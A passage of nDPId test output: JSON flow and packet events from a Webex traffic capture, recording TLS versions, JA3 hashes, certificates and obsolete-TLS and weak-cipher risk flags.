{"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":534,"source":"webex.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":3,"flow_last_seen":1444570640407,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570640407,"pkt":"ABoRAAACABoRAAABCABFAAAoO9lAAEAGNmAKCAABUEpuRILnAbv7u\/+EBEQAfVAQOQgpkQAA"} -00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":535,"source":"webex.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":3,"flow_last_seen":1444570640408,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570640408,"pkt":"ABoRAAACABoRAAABCABFAAAosmNAAEAGv9UKCAABUEpuRILoAbtZhnZApnmJwVAQOQgpkAAA"} -00927{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":536,"source":"webex.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570640382,"flow_last_seen":1444570640408,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1444570640408,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33511,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00927{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":538,"source":"webex.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570640385,"flow_last_seen":1444570640408,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1444570640408,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33512,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01472{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":543,"source":"webex.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570638225,"flow_last_seen":1444570640491,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3697,"flow_tot_l4_payload_len":3924,"flow_avg_l4_payload_len":654,"midstream":0,"thread_ts_msec":1444570640491,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"216.58.208.40","src_port":43433,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ssl.google-analytics.com","server_names":"*.google-analytics.com,app-measurement.com,google-analytics.com,googletagmanager.com,service.urchin.com,ssl.google-analytics.com,urchin.com,www.google-analytics.com,www.googletagmanager.com","ja3":"75edb912bc6f0a222ae3e3e47f5c89b1","ja3s":"389ed42c02ebecc32e73aa31def07e14","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Google Inc, CN=Google Internet Authority G2","subjectDN":"C=US, ST=California, L=Mountain View, O=Google Inc, CN=*.google-analytics.com","fingerprint":"E0:F0:1E:71:F2:B5:D9:2D:F7:4E:8F:CB:10:37:17:7C:0C:C4:07:9D"}} -00968{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":547,"source":"webex.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570640385,"flow_last_seen":1444570640593,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":345,"flow_avg_l4_payload_len":57,"midstream":0,"thread_ts_msec":1444570640593,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33512,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"6dfe5eb347aa509fc445e5628d467a2b","unsafe_cipher":2,"cipher":"TLS_RSA_WITH_RC4_128_MD5"}} -00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":586,"source":"webex.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570669736,"flow_last_seen":1444570669736,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570669736,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51154,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":586,"source":"webex.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1444570669736,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570669736,"pkt":"ABoRAAACABoRAAABCABFAAA80OhAAEAGQOUKCAABPm3geMfSAbvlsh8HAAAAAKACOQhHhwAAAgQFtAQCCAoATM\/vAAAAAAEDAwY="} -00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":587,"source":"webex.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":2,"flow_last_seen":1444570669745,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570669745,"pkt":"ABoRAAACABoRAAABCABFAAAoAiJAABAGP8A+beB4CggAAQG7x9IaTeD45bIfCFAS\/\/+9VQAA"} -00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":588,"source":"webex.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570669745,"flow_last_seen":1444570669745,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570669745,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51155,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":588,"source":"webex.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1444570669745,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570669745,"pkt":"ABoRAAACABoRAAABCABFAAA8QwJAAEAGzssKCAABPm3geMfTAbvSW4ztAAAAAKACOQjs9gAAAgQFtAQCCAoATM\/vAAAAAAEDAwY="} -00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":589,"source":"webex.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":2,"flow_last_seen":1444570669760,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570669760,"pkt":"ABoRAAACABoRAAABCABFAAAoAiNAABAGP78+beB4CggAAQG7x9MtpHMS0luM7lAS\/\/+9VAAA"} -00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":590,"source":"webex.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":3,"flow_last_seen":1444570669760,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570669760,"pkt":"ABoRAAACABoRAAABCABFAAAo0OlAAEAGQPgKCAABPm3geMfSAbvlsh8IGk3g+VAQOQiETgAA"} -00940{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":591,"source":"webex.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570669736,"flow_last_seen":1444570669760,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570669760,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51154,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":593,"source":"webex.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":3,"flow_last_seen":1444570669762,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570669762,"pkt":"ABoRAAACABoRAAABCABFAAAoQwNAAEAGzt4KCAABPm3geMfTAbvSW4zuLaRzE1AQOQiETQAA"} -00940{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":594,"source":"webex.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570669745,"flow_last_seen":1444570669762,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570669762,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51155,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01403{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":602,"source":"webex.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570669736,"flow_last_seen":1444570670676,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":3970,"flow_avg_l4_payload_len":661,"midstream":0,"thread_ts_msec":1444570670676,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51154,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} -01403{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":606,"source":"webex.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570669745,"flow_last_seen":1444570670730,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":3970,"flow_avg_l4_payload_len":661,"midstream":0,"thread_ts_msec":1444570670730,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51155,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} -00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":632,"source":"webex.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570672215,"flow_last_seen":1444570672215,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570672215,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41419,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":632,"source":"webex.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1444570672215,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570672215,"pkt":"ABoRAAACABoRAAABCABFAAA8MYhAAEAGVYAKCAABQERpZ6HLAbsAQeF1AAAAAKACOQgEvgAAAgQFtAQCCAoATND9AAAAAAEDAwY="} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":633,"source":"webex.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":2,"flow_last_seen":1444570672219,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570672219,"pkt":"ABoRAAACABoRAAABCABFAAAoAjpAABAGtOJARGlnCggAAQG7ocv\/vh6KAEHhdlAS\/\/9YlwAA"} -00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":634,"source":"webex.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":3,"flow_last_seen":1444570672219,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570672219,"pkt":"ABoRAAACABoRAAABCABFAAAoMYlAAEAGVZMKCAABQERpZ6HLAbsAQeF2\/74ei1AQOQgfkAAA"} -00939{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":635,"source":"webex.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570672215,"flow_last_seen":1444570672269,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570672269,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41419,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01402{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":643,"source":"webex.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570672215,"flow_last_seen":1444570672626,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3939,"flow_tot_l4_payload_len":4002,"flow_avg_l4_payload_len":667,"midstream":0,"thread_ts_msec":1444570672626,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41419,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} -00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":662,"source":"webex.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570674487,"flow_last_seen":1444570674487,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570674487,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.0.110","src_port":55665,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":662,"source":"webex.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":1,"flow_last_seen":1444570674487,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570674487,"pkt":"ABoRAAACABoRAAABCABFAAA8CB5AAEAGejQKCAABrfMAbtlxAbui3tn8AAAAAKACOQgsWAAAAgQFtAQCCAoATNHiAAAAAAEDAwY="} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":663,"source":"webex.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":2,"flow_last_seen":1444570674499,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570674499,"pkt":"ABoRAAACABoRAAABCABFAAAoAklAABAGsB2t8wBuCggAAQG72XFdISYDot7Z\/VAS\/\/8cOwAA"} -00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":664,"source":"webex.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":3,"flow_last_seen":1444570674500,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570674500,"pkt":"ABoRAAACABoRAAABCABFAAAoCB9AAEAGekcKCAABrfMAbtlxAbui3tn9XSEmBFAQOQjjMwAA"} -00941{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":665,"source":"webex.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570674487,"flow_last_seen":1444570674600,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1444570674600,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.0.110","src_port":55665,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"64ea4359ad4b496db653a3f30f7073e6","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01402{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":671,"source":"webex.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570674487,"flow_last_seen":1444570675110,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":4094,"flow_avg_l4_payload_len":682,"midstream":0,"thread_ts_msec":1444570675110,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.0.110","src_port":55665,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"64ea4359ad4b496db653a3f30f7073e6","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} -00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":736,"source":"webex.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570675941,"flow_last_seen":1444570675941,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570675941,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.229.158","src_port":51833,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":736,"source":"webex.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":1,"flow_last_seen":1444570675941,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570675941,"pkt":"ABoRAAACABoRAAABCABFAAA8SaRAAEAGwwMKCAABPm3lnsp5AbteGJvVAAAAAKACOQhIBAAAAgQFtAQCCAoATNJxAAAAAAEDAwY="} -00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":737,"source":"webex.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":2,"flow_last_seen":1444570675945,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570675945,"pkt":"ABoRAAACABoRAAABCABFAAAoAm5AABAGOk4+beWeCggAAQG7ynmh52QqXhib1lAS\/\/+1iAAA"} -00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":739,"source":"webex.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":3,"flow_last_seen":1444570675946,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570675946,"pkt":"ABoRAAACABoRAAABCABFAAAoSaVAAEAGwxYKCAABPm3lnsp5AbteGJvWoedkK1AQOQh8gQAA"} -00942{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":740,"source":"webex.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570675941,"flow_last_seen":1444570675997,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1444570675997,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.229.158","src_port":51833,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"64ea4359ad4b496db653a3f30f7073e6","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":821,"source":"webex.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570679512,"flow_last_seen":1444570679512,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570679512,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.0.110","src_port":55669,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 